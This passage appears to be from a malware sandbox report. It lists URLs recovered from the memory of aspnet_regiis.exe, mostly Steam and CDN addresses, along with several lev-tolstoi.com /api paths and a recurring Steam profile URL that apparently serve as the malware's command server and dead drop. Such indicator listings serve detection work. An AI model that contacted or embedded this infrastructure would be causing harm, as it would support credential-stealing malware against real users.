                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sl
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.st
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243704509.0000000005C00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: aspnet_regiis.exe, 00000003.00000002.2243704509.0000000005C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/G
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/Sg5h
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/T
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242472000.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000354C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2150477826.00000000035EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243324793.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2150287514.00000000035E9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2150852564.00000000035E9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243324793.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081524747.000000000355C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242472000.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiN
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apis
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003533000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: aspnet_regiis.exe, 00000003.00000002.2243704509.0000000005C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/s~
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/uo
                Source: aspnet_regiis.exe, 00000003.00000003.2242472000.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243324793.00000000035DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/uo(h
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steamp
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.b
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243324793.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242472000.00000000035CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900P
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: aspnet_regiis.exe, 00000003.00000002.2243324793.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242472000.00000000035CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.c
                Source: aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
